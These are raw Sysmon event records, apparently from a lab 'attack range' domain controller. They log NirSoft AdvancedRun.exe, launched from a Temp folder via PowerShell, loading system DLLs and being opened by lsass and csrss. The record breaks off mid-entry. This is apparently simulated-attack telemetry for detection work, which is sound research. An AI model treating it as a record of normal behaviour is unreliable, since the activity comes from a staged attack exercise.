10341000x80000000000000004075922Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.542{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004075921Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.537{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075920Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.524{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075919Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.522{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075918Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.521{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075917Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.520{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004075916Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.519{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075915Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.516{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075914Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.515{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075913Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.513{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075912Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.513{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075911Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.513{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075910Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.513{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075909Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.512{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075908Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.511{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075907Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.511{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004075906Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.510{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075905Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.510{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075904Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.510{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075903Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.510{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 
(rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075902Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.509{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075901Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.509{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075900Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.509{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004075899Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.509{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075898Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.508{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075897Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.508{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.508{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.507{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075894Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.505{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075893Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.504{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075892Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.503{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075891Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.502{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075890Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.502{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004075889Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.502{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075888Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.501{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075887Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.500{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075886Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.500{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075885Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.499{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075884Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.499{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075883Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.499{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you 
choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004075882Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.496{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004075881Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.495{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\Na
